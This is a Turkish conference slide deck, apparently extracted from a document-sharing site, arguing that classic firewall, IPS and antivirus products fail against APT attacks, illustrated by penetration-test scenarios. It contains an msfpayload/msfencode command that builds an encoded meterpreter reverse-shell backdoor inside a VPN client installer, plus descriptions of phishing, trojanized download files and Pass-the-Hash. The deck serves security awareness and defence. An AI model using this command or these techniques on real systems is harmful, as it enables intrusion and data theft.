APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği



Benzer belgeler
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

GELİŞMİŞ SİBER SİLAHLAR VE TESPİT YÖNTEMLERİ. Bahtiyar BİRCAN Uzman Araştırmacı Siber Güvenlik Enstitüsü

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Enerji, bankacılık, finans, telekomünikasyon gibi önemli sektörler Sinara Labs ile siber saldırılar a karşı güvende

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Bilgi Güvenliği

Hedef Odaklı Sızma Testleri

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

Gelişmiş Siber Tehdidler (APT): Genel Bakış

WebSiteDefender ile Web Uygulama Güvenliği

VoIP Pentest NetSEC / Microso3 Türkiye Ozan UÇAR ozan.ucar@bga.com.tr

Web Uygulama Güven(siz)liği 2.0

SİBER SUÇLARA KARŞI SİBER ZEKA

Güvenlik Mühendisliği

Ülkemizdeki Üniversite Web Sayfalarının Siber Güvenlik Açısından Hızlı Bir Değerlendirmesi

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

5651 ve 5070 Sayılı Kanun Tanımlar Yükümlülükler ve Sorumluluklar Logix v2.3 Firewall. Rekare Bilgi Teknolojileri

Yeni Nesil Ağ Güvenliği

01 Şirket Profili

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

ÖRÜN (WEB) GÜVENLİĞİ. Hazırlayan: Arda Balkanay

2. dönem itibariyle ben de Zararlı Yazılım Analizi 101 dersi vererek bu programa katkıda bulunacağım.

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

BİLGİ GÜVENLİĞİ. Bu bolümde;

Zararlı Kodlar& Analiz Temelleri ve Bir Saldırının Anatomisi

NGN ve VoIP Ağları Güvenlik Denetimi

Bilgi Güvenliği Eğitim/Öğretimi

Ders İ zlencesi. Ders Başlığı. Dersin amacı. Önceden sahip olunması gereken beceri ve bilgiler. Önceden alınması gereken ders veya dersler

Sisteminiz Artık Daha Güvenli ve Sorunsuz...

FTP ve Güvenlik Duvarları

Sızma Testlerinde Fiziksel Güvenlik Riskleri

SİBER ESPİYONAJ FAALİYETLERİ VE TÜRKİYE

BİLGİ GÜVENLİĞİ. İsmail BEZİRGANOĞLU İdari ve Mali İşler Müdürü Türkeli Devlet Hastanesi

SİBER GÜVENLİK FARKINDALIĞI

WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?

İşletme ve Devreye Alma Planı Yerel Okul Sunucusu Uygulama Yazılımları Prototipi TRscaler Technology Solutions

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Güvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR Bilgi Güvenliği Akademisi (BGA)

Bilgi Sistemlerinde Merkezi Kayıt Yönetimi ve Olay İlişkilendirme

Bilgi Güvenliği Farkındalık Eğitimi

Icerik filtreleme sistemlerini atlatmak icin kullanacağımız yöntem SSH Tünelleme(SSH in SOCKS proxy ozelligini kullanacagiz).

: 36 milyon Euro çalan malware Eurograbber

Blog ve WordPress Kavramları 2. WordPress.com a Nasıl Üye Olabilirim? 10. Nelere İhtiyacımız Var? 18

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

Google Hacking. Gelişmiş Google Operatörleri

Web Application Penetration Test Report

BioAffix Ones Technology nin tescilli markasıdır.

aselsan Güvenli Bilgi Paylaşımı ve SAHAB aselsan Ali YAZICI Türk Silahlı Kuvvetlerini Güçlendirme Vakfı nın bir AZERBAYCAN-Temmuz kuruluşudur.

Remote access? Tabi ki!

Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği

VPN NEDIR? NASıL KULLANıLıR?

Dünyada Veri Kaçağı ve Veri Kaçağı Önleme (DLP) Sistemleri Tahsin TÜRKÖZ Bilişim Sistemleri Güvenliği Grubu

Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

KAMU SİBER GÜVENLİK GÜNÜNE HOŞGELDİNİZ

Proticaret Exclusive v3.2.0 E-Ticaret Yazılımı Kurulum Dokümanı

Siber Dünyada İzleme ve Takip. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Twitter:

Firewall/IPS Güvenlik Testleri Eğitimi

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

SIZMA TESTİ EĞİTİMLERİ

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Berqnet Sürüm Notları Sürüm 4.1.0

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a)

APT Mantığı ve Aşamaları

1 WEB GÜVENLIĞINE GIRIŞ

Anti-Virüs Atlatma 3. Kurulum

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

BÖLÜM 8. Bilişim Sistemleri Güvenliği. Doç. Dr. Serkan ADA

İnternet te Bireysel Güvenliği Nasıl Sağlarız? Rauf Dilsiz Bilgi Güvenliği Uzmanı

Elbistan Meslek Yüksek Okulu GÜZ Yarıyılı. Öğr. Gör. Murat KEÇECĠOĞLU

Masaüstü Sanallaş4rma. Ökkeş Özdemir Kurumsal Teknoloji Danışmanı

Kaspersky Open Space Security: Release 2. İşletmeniz için birinci sınıf bir BT güvenliği çözümü

Google Play Zararlısı İnceleme Raporu

Web Uygulama Güvenliği Kontrol Listesi 2010

AMAÇLAR: GÜVENLİK TESTLERİNDE BİLGİ TOPLAMA: AKTİF BİLGİ TOPLAMA

BioAffix Ones Technology nin tescilli markasıdır.

SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak

VERİ GÜVENLİĞİ. Ağ Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü

Temel Kavramlar-2. Aşağıda depolama aygıtlarının kapasitelerini inceleyebilirsiniz.

e-fatura Portalı Kullanım Kılavuzu

Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ TwiZer:

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

ERİŞİM ENGELLEME DOS VE DDOS:

Özgür Yazılımlar ile Kablosuz Ağ Denetimi

İÇERİK YÖNETİM SİSTEMİ (CMS) Bir web sitesi yayınlamak için yapılması gerekenler:

Trend Micro Worry-Free Business Security 8.0 İlk Kez Kurulumla İlgili İpuçları ve Püf Noktaları

Bilgi Güvenliği AKADEMİSİ Eği3m Dosyası

5651 Sayılı Kanun Hakkında Kanunla ilgili detay bilgiler

HATAY KHB BILGI İŞLEM BİRİMİ

DNS Nedir? HİKMET TÜYSÜZ

Siber Teröristlere Karşı Kurumlar Nasıl Korunmalıdır? Yusuf TULGAR NetDataSoft Genel Müdürü

ProTicaret Exclusive 4.05 E-Ticaret Yazılımı Kurulum Dokümanı

SİBER GÜVENLİK HİZMETLERİ VE ÜRÜNLERİ.

Windows Temelli Zararlı Yazılımlarla Mücadele

Tarih Saat Modül Adı Öğretim Üyesi. 01/05/2018 Salı 3 Bilgisayar Bilimlerine Giriş Doç. Dr. Hacer Karacan

INFORMATION & SECURITY TECHNOLOGIES. BOA - Trend Micro. Zararlı Yazılım Analizi ve APT. Yasin SÜRER yasin.surer@boateknoloji.com

Kurumsal Ağlarda Web Sistem Güvenliği

Transkript:

APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Huzeyfe.onal@bga.com.tr Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

Huzeyfe ÖNAL Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş<rmacısı @BGA PenetraAon Tester Eğitmen Bilgi Güvenliği AKADEMİSİ Linux AKADEMİ ÖğreAm Görevlisi Bilgi / Bahçeşehir Üniversitesi Blogger - www.lifeoverip.net

Amaç Günümüz güvenlik problemlerinin temelini oluşturan son kullanıcı farkındalık eksikliği ve zararlı yazılımlar karşısında Firewall/IPS/AnAvirüs gibi klasik siber güvenlik sistemlerinin yetersizliğinin anlaşılması.

!! Uyarı!! Bu sunumda geçen tüm olaylar ve ekran görüntülerinin gerçek kişilerle ilgisi yoktur, sanal dünyadan alınmış[r. Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

10 Sene Önce Siber Dünya Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

Geleneksel Güvenlik Yaklaşımı Network, işleam sistemi ve servis güvenliği Router(ACL), Firewall Intrusion DetecAon System Intrusion PrevenAon System»... Bütçenin tamamına yakını standart savunma sistemleri için ayrılır. Kullanıcılara yönelik tehdit genellikle es geçilir...onun zaten farkındayız yaklaşımı GerçekleşArilen güvenlik testleri kontrol listesindeki bir maddeyi daha geçebilmek için yap<rılır.

Katmanlı Güvenlik Mimarisi(?) Güvenlik ürünleri listesi Güvenlik duvarı Saldırı Tespit ve Engelleme Sistemi AnAvirüs, AnAspam, AnA NAC, 802.1x çözümü DLP Güvenliğin artması para harcama ile doğru oran<lı değildir Katmanlı güvenlik mimarisini yanlış anlama

Sorularla Güvenliğimiz Kaç kişi/kurum son bir yıl içerisinde APT benzeri sofisake bir saldırıya maruz kaldı Daha da önemlisi kaç kişi/kurum bu saldırıya maruz kaldığını tespit ej ve nasıl/ne zaman? Daha daha da önemlisi kaç kurum bu Ap saldırıyla karşı karşıya kaldığından habersiz? BGA dan örnekleri Kamu / Özel sektör

APT Kavramı A.P.T (Advanced Persistent Threat) 2010 yılında gündemimize girmiş görece olarak yeni bir konu. Yeni arayışlar ve sektöre heyecan katmak amacıyla gelişarilmiş bir konu mu? Çok daha öncesinden varolan fakat yeteri kadar önem verilmeyen, büyük firmaları hedef alındığında gerçek önemi ortaya çıkan bir konu mu? Teknik olarak eski yöntemler, yeni moavasyonlar Güvenlikcilerin 0-3 yenik başladığı bir kavram

APT ile Mücadele APT kolay tanımlanabilir bir konu olmadığı için mücadelesi de zordur, Mücadelede en önemli husus kime karşı neyin mücadelesinin verildiğidir Saldırgan gibi düşünebilmek ve onların yeteneklerini simule etmek hayaa öneme sahipar. Tanımlanabilir tehditleri engellemek kolaydır Hata: Kolay tanımlanabilir olmayan riskleri eski man<kla çözmeye kalkmak AV firmalarının APT ile uğraşması Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

APT Saldırı Anatomisi Kaynak: RSA güv. konferansı

APT Yaşam Döngüsü Faz Ak^vite Detaylar I. Faz Keşif, hedef belirleme Hedefin ve hedefe ulaşılabilecek yolların tespit edilmesi II. Faz Oltalama e- postasının gönderilmesi Genellikle bu yöntem tercih edilir (kolay, zahmetsiz ve az teknik detay gerekardiğinden) III. Faz Hedefle irabata geçme Hedef sisteme arka kapı yükleme IV. Faz Hak yükseltme, hedef alanını genişletme Hedef sistemde daha yüksek yetkili kullanıcı haklarına geçiş, farklı ağları keşif V. Faz Veri Kaçırma Hedef sistemden ilgili verilerin şifrelenerek dışarı çıkar<lması, yedeklenmesi VI. Faz Erişimi kalıcı kılma İstenildiğinde tekrar bağlanılabilecek bir yapıyı kurup, logların ve diğer delillerin silinmesi.

APT MoAvasyonu ve Akçeli İşler APT saldırılarında en önemli bileşen saldırganın moavasyonudur. Bu moavasyon genellikle maddi karşılık<r. Saldırganın moavasyon durumuna göre APT saldırısı 1 gün de sürebilir 4 yıl da sürebilir. 0 day exploit çıkması için beklenen süre v.s Hacklenen 3. para yazılımın güncellenmesini bekleme

Türkiye den İstaAsAkler

Hatalı APT Yaklaşımları Bize birşey olmaz yaklaşımı Saldırgan bula bula bizi mi bulacakj Sadece ürünle çözmeye çalışmak Sadece ağ trafiği dinleyerek çözmeye çalışmak Farkındalık+APT ürünü+log yöneami+offsec Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

Örnek APT Senaryo İncelemeleri 1 2

Senaryo- I Sebep:Farkındalık ve son kullanıcı güvenlik önlemlerinin yetersiz olması Hikaye: Saldırgan ipsec VPN kullanan firmaları hedef alarak erişim bilgilerini toplayarak bunları satmak ister. Bunun için bir adet tuzak sistem kurar (kurulu sistemi hackler) ve arama motorları sonuçlarına güvenen son kullanıcıları avlamaya başlar. Günün sonunda başladığı yerden bir mil ötede hiç hesaba katmadığı firmaların iç ağlarına erişip hassas çizimleri başkalarına para karşılığında satar

Senaryo internet üzerinden bir exe dosyasının indirilmesi ile başlar Internet üzerinden exe yasaklanabilir (?) Senaryodaki.exe yerine.pdf,.zip, xls,.doc ve benzeri uzan<lar kullanılabilir veya uzan<ya gerek olmadan yeni çıkmış 0 day açıklardan biri kullanılarak Explorer ve benzeri browserlar üzerinden işlem yap<rılabilir.

Keşif, Bilgi Toplama ve Tuzak Adımı Saldırgan Google kullanarak VPN istemcisi ara<r ve ilk sayfada çıkan linke <klayarak programı indirir Bilgisayarına programı kurar ve VPN bağlan<sını başla<r. Saldırgan program çalış<ğında son kullanıcı bilgisayarına erişim sağlar

İlk Adım Zorlukları Google da ilk sayfada çıkan sistemin hacklenmesi SSL heartbleed açıklığı sonrası durum İlk sayfada çıkan sistem hacklenemiyorsa yeni bir site kurup Black Seo yöntemleri ile ilk sayfaya alınması Hemen her gün yeni güvenlik zafiyetleri yayınlanır

VPN İstemci Programına Arka kapı YerleşArme msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.106 R msfencode - t exe - x template_x86_windows.exe - k - o nt_backdoor.exe - e x86/shikata_ga_nai - c 5

AnA- (Virus/Malware/ ) Atlatma Özelliği Ekleme Klasik güvenlik korumaları Aspirin gibidir. Bilinen basit durumlar için işe yarar. ÜreAlen zararlı yazılımların %80 civarının yaşam süresi 3 saajr. Bunun içinde tek kullanımlık malware oranı %70 dir.

AV ler Tara}ndan Tanınmaz Zararlı Oluşturma Fireeye AAPT PT Etkinliği Fireeye tkinliği // I Istanbul stanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) BGA.COM.TR

Örnek Uygulama Çık<sı

Bekleme Süresi APT saldırılarında en önemli hususlardan biri saldırganın acelesinin olmamasıdır. Saldırgan ağını hazırlar, kurar ve uzun bir süre bekler. Örnek senaryoda 6 ay civarında bir bekleme süresi olduğu tespit edilmişar.

Hassas Bilgilerin Elde Edilmesi

FTP Erişimi ve FTP deki Dosyalara Arka Kapı YerleşArme Saldırgan elde ejği erişim bilgilerini kullanarak FTP sunucuya bağlanır ve FTP sunucuda en son güncellenen dosyaları inceleyerek orjinallerini arka kapılı sürümleriyle değişarir. 3 gün sonra ip adresi X.y.z.t li bir istemcinin merkezi komuta sistemine bağlandığını görür. Hızlıca ilgili kullanıcının bilgisayarına erişim sağlar Bilgisayar firmanın help desk birimi çalışanına aijr ve en yetkili kullanıcı hesabı bilgisayara login olmuştur. Bellek dökümü yaparak parolanın açık hali elde edilir

Sunucu Taraflı bir APT Saldırgan çok bilinen bir blog/cms sisteminin Türkiye sitesini hackler Parola tahmini Bir sonraki sürüm için zaman sayar ve yeni sürüm çık<ğında siteye eklenen yeni Türkçe sürüm dosyaları içine bir adet arka kapı barındıran php dosyası ekler, hash değerlerini değişarir. Bir ha a sonra ilgili dosyanın download sayısı 173.000 olmuştur. Saldırgan tek bir harekea ile 173.000 sisteme arka kapı bırakır.

Apt devam Sunucu loglarından ilgili dosyaları indiren ip adresleri tespit edilip hangilerinde blog yazılımı kurulu belirlenir ve arka kapıların hangi sistemlerde olduğu tespit edilir. Arka kapı üzerinden sunucu ele geçirilir Windows uzerinde Apache Admin hakları ile çalışmaktadır DMZ bölgesindeki diger sunuculara PassThe Hash yöntemi ile erişim sağlanır ve veritabanı sunucusundan yerel ağa erişilir

Türkiye den Örnek APT TesA ve Sonucu Firma ile anlaşma yapılır Gizlilik sözleşmesinde geçen firma ismi hariç hiç bilgi alınmamış<r. Sosyal ağ sitelerinden araş<rma yapılarak hedef 50 kişi belirlenir. (LinkedIN) Firmanın twi er/facebook sayfaları takip edilerek kampanya/duyuru zamanı beklenir. Kampanya ile ilgili siteye benzer alan adı alınarak SPF kayıtları, MX kayıtları girilir ve sahte e- posta hazırlanır. 50 çalışana e- posta gönderilir ve beklemeye alınır.

Ilk 10 dakika içinde 7 kullanıcı sisteme erişmeye çalışır. Hızlıca kullanıcıların hesap bilgileri kullanılarak webmail sistemine erişim sağlanır Tüm kullanıcı bilgisi alınır (bağlı olunan birim ve tel numaraları dahil) Anahtar kelime araması gerçekleşarilir (*.pcf) Bir adet vpn config ve user/pass elde edilir Vpn kurulumu icin gece 03:00 beklenir VPN kurulur yerel ağa bağlan< sağlanır, RDP üzerinden parolası alınan bilgisayara bağlanılır. AV durduruldu, kalıcı arka kapı yüklendi, yerel ağ portları tarandı DB bulundu, erişim sağlandı

Kuruma Ödev Testleri tamamladıktan sonra saldırı tespit ve engelleme sistemini uyaracak çeşitli sahte ataklar düzenlendi. Kuruma bir ha a içerisinde gerçekleşarilen siber saldırı simulasyonu sonucunda eldeki bulguları soruldu IPS logları haric elle tutulur hicbir bilgi gelmedi. Kısacası kurum yap<ğı milyon dolarlık ya<rımın gerçek bir APT saldırısı karşısında kendisini savunamayacağını gördü

Sonuç Siber dünyada güvenliğimiz sadece bize ve sınırlarımıza bağlı değildir. Özellikle hizmet alınan 3. para firmalar ve bunların erişimleri/yetkileri büyük problemdir. Internet üzerinden elde edilen veya yerel ağda dolaşımda olan her tür çalış<rılabilir dosya kontrolden geçmeli. APT teknik bir problemden öte iş dünyasını ilgilendiren hassas bir konudur.

İleAşim Bilgileri Blog www.lifeoverip.net Blog.bga.com.tr Twi er @bgasecurity @huzeyfeonal İleAşim huzeyfe@lifeoverip.net Huzeyfe.onal@bga.com.tr